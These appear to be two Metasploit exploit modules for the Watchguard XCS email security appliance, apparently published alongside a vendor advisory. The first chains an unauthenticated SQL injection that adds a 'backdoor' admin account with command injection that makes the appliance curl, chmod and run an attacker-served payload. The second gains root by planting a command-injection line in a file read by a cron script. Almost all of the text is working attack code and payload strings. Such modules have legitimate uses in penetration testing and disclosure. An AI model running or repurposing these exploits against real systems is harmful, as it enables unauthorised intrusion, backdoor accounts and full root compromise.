contact us:
Web www.security-assessment.com
Email info () security-assessment.com
Phone +64 4 470 1650
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Watchguard XCS Remote Command Execution',
'Description' => %q{
This module exploits two separate vulnerabilities found in the Watchguard XCS virtual
appliance to gain command execution. By exploiting an unauthenticated SQL injection, a
remote attacker may insert a valid web user into the appliance database, and get access
to the web interface. On the other hand, a vulnerability in the web interface allows the
attacker to inject operating system commands as the 'nobody' user.
},
'Author' =>
[
'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
],
'Platform' => 'bsd',
'Arch' => ARCH_X86_64,
'Privileged' => false,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'Watchguard XCS 9.2/10.0', { }]
],
'DefaultOptions' =>
{
'SSL' => true
},
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 29 2015'
))
register_options(
[
OptString.new('TARGETURI', [true, 'The target URI', '/']),
OptString.new('WATCHGUARD_USER', [true, 'Web interface user account to add', 'backdoor']),
OptString.new('WATCHGUARD_PASSWORD', [true, 'Web interface user password', 'backdoor']),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
Opt::RPORT(443)
],
self.class
)
end
def check
#Check to see if the SQLi is present
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
'cookie' => "sid=1'"
})
if res && res.body && res.body.include?('unterminated quoted string')
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
# Get a valid session by logging in or exploiting SQLi to add user
print_status('Getting a valid session...')
@sid = get_session
print_status('Successfully logged in')
# Check if cmd injection works
test_cmd_inj = send_cmd_exec('/ADMIN/mailqueue.spl', 'id')
unless test_cmd_inj && test_cmd_inj.body.include?('uid=65534')
fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable')
end
# We have cmd exec, stand up an HTTP server and deliver the payload
vprint_status('Getting ready to drop binary on appliance')
@elf_sent = false
# Generate payload
@pl = generate_payload_exe
if @pl.nil?
fail_with(Failure::BadConfig, 'Please select a native bsd payload')
end
# Start the server and use primer to trigger fetching and running of the payload
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
end
end
def attempt_login(username, pwd_clear)
#Attempts to login with the provided user credentials
#Get the login page
get_login_hash = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/login.spl')
})
unless get_login_hash && get_login_hash.body
fail_with(Failure::Unreachable, 'Could not get login page.')
end
#Find the hash token needed to login
login_hash = ''
get_login_hash.body.each_line do |line|
next if line !~ /name="hash" value="(.*)"/
login_hash = $1
break
end
sid_cookie = (get_login_hash.get_cookies || '').scan(/sid=(\w+);/).flatten[0] || ''
if login_hash == '' || sid_cookie == ''
fail_with(Failure::UnexpectedReply, 'Could not find login hash or cookie')
end
login_post = {
'u' => "#{username}",
'pwd' => "#{pwd_clear}",
'hash' => login_hash,
'login' => 'Login'
}
print_status('Attempting to login with provided credentials')
login = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/login.spl'),
'method' => 'POST',
'encode_params' => false,
'cookie' => "sid=#{sid_cookie}",
'vars_post' => login_post,
'vars_get' => {
'f' => 'V'
}
})
unless login && login.body && login.body.include?('<title>Loading...</title>')
return nil
end
sid_cookie
end
def add_user(user_id, username, pwd_hash, pwd_clear)
#Adds a user to the database using the unauthed SQLi
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, '/borderpost/imp/compose.php3'),
'cookie' => "sid=1%3BINSERT INTO sds_users (self, login, password, org, priv_level, quota, disk_usage) VALUES(#{user_id}, '#{username}', '#{pwd_hash}', 0, 'server_admin', 0, 0)--"
})
unless res && res.body
fail_with(Failure::Unreachable, "Could not connect to host")
end
if res.body.include?('ERROR: duplicate key value violates unique constraint')
print_status("Added backdoor user, credentials => #{username}:#{pwd_clear}")
else
fail_with(Failure::UnexpectedReply, 'Unable to add user to database')
end
true
end
def generate_device_hash(cleartext_password)
#Generates the specific hashes needed for the XCS
pre_salt = 'BorderWare '
post_salt = ' some other random (9) stuff'
hash_tmp = Rex::Text.md5(pre_salt + cleartext_password + post_salt)
final_hash = Rex::Text.md5(cleartext_password + hash_tmp)
final_hash
end
def send_cmd_exec(uri, os_cmd, blocking = true)
#This is a handler function that makes HTTP calls to exploit the command injection issue
unless @sid
fail_with(Failure::Unknown, 'Missing a session cookie when attempting to execute command.')
end
opts = {
'uri' => normalize_uri(target_uri.path, "#{uri}"),
'cookie' => "sid=#{@sid}",
'encode_params' => true,
'vars_get' => {
'f' => 'dnld',
'id' => ";#{os_cmd}"
}
}
if blocking
res = send_request_cgi(opts)
else
res = send_request_cgi(opts, 1)
end
#Handle cmd exec failures
if res.nil? && blocking
fail_with(Failure::Unknown, 'Failed to exploit command injection.')
end
res
end
def get_session
#Gets a valid login session, either valid creds or the SQLi vulnerability
username = datastore['WATCHGUARD_USER']
pwd_clear = datastore['WATCHGUARD_PASSWORD']
user_id = rand(999)
sid_cookie = attempt_login(username, pwd_clear)
return sid_cookie unless sid_cookie.nil?
vprint_error('Failed to login, attempting to add backdoor user...')
pwd_hash = generate_device_hash(pwd_clear)
unless add_user(user_id, username, pwd_hash, pwd_clear)
fail_with(Failure::Unknown, 'Failed to add user account to database.')
end
sid_cookie = attempt_login(username, pwd_clear)
unless sid_cookie
fail_with(Failure::Unknown, 'Unable to login with user account.')
end
sid_cookie
end
# Make the server download the payload and run it
def primer
vprint_status('Primer hook called, make the server get and run exploit')
#Gets the autogenerated uri from the mixin
payload_uri = get_uri
filename = rand_text_alpha_lower(8)
print_status("Sending download request for #{payload_uri}")
download_cmd = "/usr/local/sbin/curl -k #{payload_uri} -o /tmp/#{filename}"
vprint_status("Telling appliance to run #{download_cmd}")
send_cmd_exec('/ADMIN/mailqueue.spl', download_cmd)
register_file_for_cleanup("/tmp/#{filename}")
chmod_cmd = "chmod +x /tmp/#{filename}"
vprint_status('Chmoding the payload...')
send_cmd_exec("/ADMIN/mailqueue.spl", chmod_cmd)
exec_cmd = "/tmp/#{filename}"
vprint_status('Running the payload...')
send_cmd_exec('/ADMIN/mailqueue.spl', exec_cmd, false)
vprint_status('Finished primer hook, raising Timeout::Error manually')
raise(Timeout::Error)
end
#Handle incoming requests from the server
def on_request_uri(cli, request)
vprint_status("on_request_uri called: #{request.inspect}")
print_status('Sending the payload to the server...')
@elf_sent = true
send_response(cli, @pl)
end
end
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Local
# It needs 3 minutes wait time
# WfsDelay set to 180, so it should be a Manual exploit,
# to avoid it being included in automations
Rank = ManualRanking
include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Watchguard XCS FixCorruptMail Local Privilege Escalation',
'Description' => %q{
This module exploits a vulnerability in the Watchguard XCS 'FixCorruptMail' script called
by root's crontab which can be exploited to run a command as root within 3 minutes.
},
'Author' =>
[
'Daniel Jensen <daniel.jensen[at]security-assessment.com>' # discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://security-assessment.com/files/documents/advisory/Watchguard-XCS-final.pdf']
],
'Platform' => 'bsd',
'Arch' => ARCH_X86_64,
'SessionTypes' => ['shell'],
'Privileged' => true,
'Targets' =>
[
[ 'Watchguard XCS 9.2/10.0', { }]
],
'DefaultOptions' => { 'WfsDelay' => 180 },
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 29 2015'
))
end
def setup
@pl = generate_payload_exe
if @pl.nil?
fail_with(Failure::BadConfig, 'Please select a native bsd payload')
end
super
end
def check
#Basic check to see if the device is a Watchguard XCS
res = cmd_exec('uname -a')
return Exploit::CheckCode::Detected if res && res.include?('support-xcs@watchguard.com')
Exploit::CheckCode::Safe
end
def upload_payload
fname = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
write_file(fname, @pl)
return nil unless file_exist?(fname)
cmd_exec("chmod +x #{fname}")
fname
end
def exploit
print_warning('Rooting can take up to 3 minutes.')
#Generate and upload the payload
filename = upload_payload
fail_with(Failure::NotFound, 'Payload failed to upload') if filename.nil?
print_status("Payload #{filename} uploaded.")
#Sets up empty dummy file needed for privesc
dummy_filename = "/tmp/#{Rex::Text.rand_text_alpha(5)}"
cmd_exec("touch #{dummy_filename}")
vprint_status('Added dummy file')
#Put the shell injection line into badqids
#setup_privesc = "echo \"../../../../../..#{dummy_filename};#{filename}\" > /var/tmp/badqids"
badqids = write_file('/var/tmp/badqids', "../../../../../..#{dummy_filename};#{filename}")
fail_with(Failure::NotFound, 'Failed to create badqids file to exploit crontab') if badqids.nil?
print_status('Badqids created, waiting for vulnerable script to be called by crontab...')
#cmd_exec(setup_privesc)
#Cleanup the files we used
register_file_for_cleanup('/var/tmp/badqids')
register_file_for_cleanup(dummy_filename)
register_file_for_cleanup(filename)
end
end